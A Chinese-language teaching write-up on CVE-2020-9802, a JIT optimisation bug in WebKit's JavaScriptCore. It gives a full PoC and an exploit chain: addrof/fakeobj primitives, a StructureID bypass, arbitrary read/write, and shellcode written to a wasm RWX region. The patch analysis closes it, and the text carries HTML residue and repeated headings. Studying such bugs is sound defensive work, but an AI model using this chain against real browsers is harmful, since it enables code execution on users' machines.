WebKit JIT优化漏洞分析（CVE-2020-9802）教学文档<\/h1>

漏洞概述<\/h2>
CVE-2020-9802是WebKit JavaScriptCore(JSC)引擎中的一个JIT优化漏洞，位于DFG JIT编译器对ArithNegate操作的公共子表达式消除(CSE)优化过程中。攻击者可以利用该漏洞绕过数组边界检查，实现越界读写，最终可能导致任意代码执行。<\/p>

环境搭建<\/h2>
获取WebKit源码并切换到特定commit：<\/li> <\/ol>
git checkout 17218d1485b0f5d98d2aad116d4fdb2bad6aee2d
<\/span><\/span>git apply .\/patch.diff
<\/span><\/span><\/code><\/pre>
构建调试版本：<\/li>
<\/ol>
Tools\/Scripts\/build-webkit --jsc-only --debug
<\/span><\/span><\/code><\/pre>
运行PoC：<\/li>
<\/ol>
.\/jsc --useConcurrentJIT=<\/span>false .\/exp.js
<\/span><\/span><\/code><\/pre>基础知识<\/h2>
JSC优化阶段<\/h3>
JSC会对JS代码进行多阶段优化，包括：<\/p>

公共子表达式消除(CSE)：将重复计算相同表达式的代码优化为重用结果<\/li>
<\/ul>
优化限制<\/h3>
对于以下代码无法进行CSE优化：<\/p>
let<\/span> c<\/span> =<\/span> o<\/span>.a<\/span>;
<\/span><\/span>f<\/span>();
<\/span><\/span>let<\/span> d<\/span> =<\/span> o<\/span>.a<\/span>;
<\/span><\/span><\/code><\/pre>因为f()<\/code>调用可能改变o.a<\/code>的值。<\/p>
漏洞分析<\/h2>
漏洞点<\/h3>
在DFGClobberize<\/code>中，ArithNegate<\/code>操作没有使用ArithMode<\/code>：<\/p>
case<\/span> ArithNegate:
<\/span><\/span>    if<\/span> (node-><\/span>child1().useKind() ==<\/span> Int32Use ||<\/span> ...)
<\/span><\/span>        def(PureValue(node)); \/\/ 只考虑输入，忽略ArithMode
<\/span><\/span><\/span><\/code><\/pre>这导致CSE可以用unchecked<\/code>的ArithNegate<\/code>替换checked<\/code>的ArithNegate<\/code>。<\/p>
整数溢出问题<\/h3>
32位有符号整数取反时，只有INT_MIN(0x80000000)<\/code>取反会溢出：<\/p>
js<\/span>><\/span> -<\/span>2147483648<\/span> |<\/span> 0<\/span>
<\/span><\/span>-<\/span>2147483648<\/span>
<\/span><\/span>js<\/span>><\/span> 2147483648<\/span> |<\/span> 0<\/span>
<\/span><\/span>-<\/span>2147483648<\/span>
<\/span><\/span><\/code><\/pre>漏洞触发条件<\/h3>
构造以下效果：<\/p>
v<\/span> =<\/span> ArithNeg<\/span>(unchecked<\/span>) n<\/span>
<\/span><\/span>i<\/span> =<\/span> ArithNeg<\/span>(checked<\/span>) n<\/span>
<\/span><\/span><\/code><\/pre>通过CSE优化后变为：<\/p>
v<\/span> =<\/span> ArithNeg<\/span>(unchecked<\/span>) n<\/span>
<\/span><\/span>i<\/span> =<\/span> v<\/span>
<\/span><\/span><\/code><\/pre>构造步骤<\/h3>

构造unchecked ArithNegate<\/code>：<\/li>
<\/ol>
n<\/span> =<\/span> n<\/span> |<\/span> 0<\/span>;  \/\/ 确保n是32位整数
<\/span><\/span><\/span><\/span>let<\/span> v<\/span> =<\/span> (-<\/span>n<\/span>) |<\/span> 0<\/span>;  \/\/ 生成unchecked ArithNegate
<\/span><\/span><\/span><\/code><\/pre>
构造checked ArithNegate<\/code>：<\/li>
<\/ol>
if<\/span> (n<\/span> <<\/span> 0<\/span>) {
<\/span><\/span>    let<\/span> i<\/span> =<\/span> Math.abs<\/span>(n<\/span>);  \/\/ 对负数会生成checked ArithNegate
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>
触发CSE优化：<\/li>
<\/ol>
function<\/span> hax<\/span>(arr<\/span>, n<\/span>) {
<\/span><\/span>    n<\/span> =<\/span> n<\/span> |<\/span> 0<\/span>;
<\/span><\/span>    if<\/span> (n<\/span> <<\/span> 0<\/span>) {
<\/span><\/span>        let<\/span> v<\/span> =<\/span> (-<\/span>n<\/span>) |<\/span> 0<\/span>;
<\/span><\/span>        let<\/span> idx<\/span> =<\/span> Math.abs<\/span>(n<\/span>);
<\/span><\/span>        if<\/span> (idx<\/span> <<\/span> arr<\/span>.length<\/span>) {
<\/span><\/span>            arr<\/span>[idx<\/span>];
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>完整PoC<\/h3>
function<\/span> Foo<\/span>(arr<\/span>, n<\/span>) {
<\/span><\/span>    n<\/span> =<\/span> n<\/span> |<\/span> 0<\/span>;
<\/span><\/span>    if<\/span> (n<\/span> <<\/span> 0<\/span>) {
<\/span><\/span>        let<\/span> v<\/span> =<\/span> (-<\/span>n<\/span>) |<\/span> 0<\/span>;
<\/span><\/span>        let<\/span> idx<\/span> =<\/span> Math.abs<\/span>(n<\/span>);
<\/span><\/span>        if<\/span> (idx<\/span> <<\/span> arr<\/span>.length<\/span>) {
<\/span><\/span>            if<\/span> (idx<\/span> &<\/span> 0x80000000<\/span>) {
<\/span><\/span>                idx<\/span> +=<\/span> -<\/span>0x7ffffffd<\/span>; \/\/ idx = 3
<\/span><\/span><\/span><\/span>            }
<\/span><\/span>            if<\/span> (idx<\/span> ><\/span> 0<\/span>) {
<\/span><\/span>                return<\/span> arr<\/span>[idx<\/span>] =<\/span> 1.04380972981885<\/span>e<\/span>-<\/span>310<\/span>; \/\/ i2f(0x133700001337)
<\/span><\/span><\/span><\/span>            }
<\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>漏洞利用<\/h2>
构造addrof和fakeobj原语<\/h3>

布置三个数组：<\/li>
<\/ol>
let<\/span> noCoW<\/span> =<\/span> 13.37<\/span>;
<\/span><\/span>let<\/span> arr<\/span> =<\/span> [noCoW<\/span>, 2.2<\/span>, 3.3<\/span>];
<\/span><\/span>let<\/span> oobArr<\/span> =<\/span> [noCoW<\/span>, 2.2<\/span>, 3.3<\/span>];
<\/span><\/span>let<\/span> objArr<\/span> =<\/span> [{}, {}, {}];
<\/span><\/span><\/code><\/pre>
实现基础原语：<\/li>
<\/ol>
function<\/span> AddrOf<\/span>(obj<\/span>) {
<\/span><\/span>    objArr<\/span>[0<\/span>] =<\/span> obj<\/span>;
<\/span><\/span>    return<\/span> f2i<\/span>(oobArr<\/span>[4<\/span>]);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> FakeObj<\/span>(addr<\/span>) {
<\/span><\/span>    addr<\/span> =<\/span> i2f<\/span>(addr<\/span>);
<\/span><\/span>    oobArr<\/span>[4<\/span>] =<\/span> addr<\/span>;
<\/span><\/span>    return<\/span> objArr<\/span>[0<\/span>];
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>绕过StructureID随机化<\/h3>
利用getByVal<\/code>的特定代码路径绕过StructureID检查：<\/p>
function<\/span> LeakStructureID<\/span>(obj<\/span>) {
<\/span><\/span>    let<\/span> container<\/span> =<\/span> {
<\/span><\/span>        cellHeader<\/span>:<\/span> i2obj<\/span>(0x0108230700000000<\/span>),
<\/span><\/span>        butterfly<\/span>:<\/span> obj<\/span>
<\/span><\/span>    };
<\/span><\/span>    let<\/span> fakeObjAddr<\/span> =<\/span> AddrOf<\/span>(container<\/span>) +<\/span> 0x10<\/span>;
<\/span><\/span>    let<\/span> fakeObj<\/span> =<\/span> FakeObj<\/span>(fakeObjAddr<\/span>);
<\/span><\/span>    f64<\/span>[0<\/span>] =<\/span> fakeObj<\/span>[0<\/span>];
<\/span><\/span>    let<\/span> structureID<\/span> =<\/span> u32<\/span>[0<\/span>];
<\/span><\/span>    u32<\/span>[1<\/span>] =<\/span> 0x01082307<\/span> -<\/span> 0x20000<\/span>;
<\/span><\/span>    container<\/span>.cellHeader<\/span> =<\/span> f64<\/span>[0<\/span>];
<\/span><\/span>    return<\/span> structureID<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>构造任意地址读写<\/h3>

创建驱动对象和共享butterfly：<\/li>
<\/ol>
var<\/span> victim<\/span> =<\/span> [noCoW<\/span>, 14.47<\/span>, 15.57<\/span>];
<\/span><\/span>victim<\/span>['prop'<\/span>] =<\/span> 13.37<\/span>;
<\/span><\/span>victim<\/span>['prop_1'<\/span>] =<\/span> 13.37<\/span>;
<\/span><\/span>
<\/span><\/span>u32<\/span>[0<\/span>] =<\/span> structureID<\/span>;
<\/span><\/span>u32<\/span>[1<\/span>] =<\/span> 0x01082309<\/span> -<\/span> 0x20000<\/span>;
<\/span><\/span>var<\/span> container<\/span> =<\/span> {
<\/span><\/span>    cellHeader<\/span>:<\/span> f64<\/span>[0<\/span>],
<\/span><\/span>    butterfly<\/span>:<\/span> victim<\/span>
<\/span><\/span>};
<\/span><\/span>
<\/span><\/span>var<\/span> containerAddr<\/span> =<\/span> AddrOf<\/span>(container<\/span>);
<\/span><\/span>var<\/span> fakeArrAddr<\/span> =<\/span> containerAddr<\/span> +<\/span> 0x10<\/span>;
<\/span><\/span>var<\/span> driver<\/span> =<\/span> FakeObj<\/span>(fakeArrAddr<\/span>);
<\/span><\/span><\/code><\/pre>
实现增强原语：<\/li>
<\/ol>
function<\/span> NewAddrOf<\/span>(obj<\/span>) {
<\/span><\/span>    boxed<\/span>[0<\/span>] =<\/span> obj<\/span>;
<\/span><\/span>    return<\/span> f2i<\/span>(unboxed<\/span>[0<\/span>]);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> NewFakeObj<\/span>(addr<\/span>) {
<\/span><\/span>    unboxed<\/span>[0<\/span>] =<\/span> i2f<\/span>(addr<\/span>);
<\/span><\/span>    return<\/span> boxed<\/span>[0<\/span>];
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>
实现任意读写：<\/li>
<\/ol>
function<\/span> Read64<\/span>(addr<\/span>) {
<\/span><\/span>    driver<\/span>[1<\/span>] =<\/span> i2f<\/span>(addr<\/span> +<\/span> 0x10<\/span>);
<\/span><\/span>    return<\/span> NewAddrOf<\/span>(victim<\/span>.prop<\/span>);
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>function<\/span> Write64<\/span>(addr<\/span>, val<\/span>) {
<\/span><\/span>    driver<\/span>[1<\/span>] =<\/span> i2f<\/span>(addr<\/span> +<\/span> 0x10<\/span>);
<\/span><\/span>    victim<\/span>.prop<\/span> =<\/span> i2f<\/span>(val<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>任意代码执行<\/h3>

查找wasm rwx区域：<\/li>
<\/ol>
var<\/span> jitFuncAddr<\/span> =<\/span> NewAddrOf<\/span>(jitFunc<\/span>);
<\/span><\/span>var<\/span> executableBaseAddr<\/span> =<\/span> Read64<\/span>(jitFuncAddr<\/span> +<\/span> 0x18<\/span>);
<\/span><\/span>var<\/span> jitCodeAddr<\/span> =<\/span> Read64<\/span>(executableBaseAddr<\/span> +<\/span> 0x8<\/span>);
<\/span><\/span>var<\/span> rwxAddr<\/span> =<\/span> Read64<\/span>(jitCodeAddr<\/span> +<\/span> 0x20<\/span>);
<\/span><\/span><\/code><\/pre>
写入shellcode并执行：<\/li>
<\/ol>
ArbitraryWrite<\/span>(rwxAddr<\/span>, shellcode<\/span>);
<\/span><\/span>jitFunc<\/span>();
<\/span><\/span><\/code><\/pre>补丁分析<\/h2>
补丁修改了DFGClobberize<\/code>中对ArithNegate<\/code>的处理：<\/p>
-<\/span> def(PureValue(node));
<\/span><\/span>+<\/span> def(PureValue(node, node-><\/span>arithMode()));
<\/span><\/span><\/code><\/pre>现在CSE会检查ArithNegate<\/code>的操作模式，防止unchecked<\/code>和checked<\/code>模式互相替换。<\/p>
参考链接<\/h2>

JITSploitation One<\/a><\/li>
JITSploitation Two<\/a><\/li>
Project Zero Issue<\/a><\/li>
ray-cp PoC<\/a><\/li>
De4dCr0w分析<\/a><\/li>
<\/ol>
WebKit JIT优化漏洞分析（CVE-2020-9802）教学文档<\/h1>

基础知识<\/h2>

漏洞利用<\/h2>

参考链接<\/h2> JITSploitation One<\/a><\/li> JITSploitation Two<\/a><\/li> Project Zero Issue<\/a><\/li> ray-cp PoC<\/a><\/li> De4dCr0w分析<\/a><\/li> <\/ol>

`参考链接<\/h2> JITSploitation One<\/a><\/li> JITSploitation Two<\/a><\/li> Project Zero Issue<\/a><\/li> ray-cp PoC<\/a><\/li> De4dCr0w分析<\/a><\/li> <\/ol>`
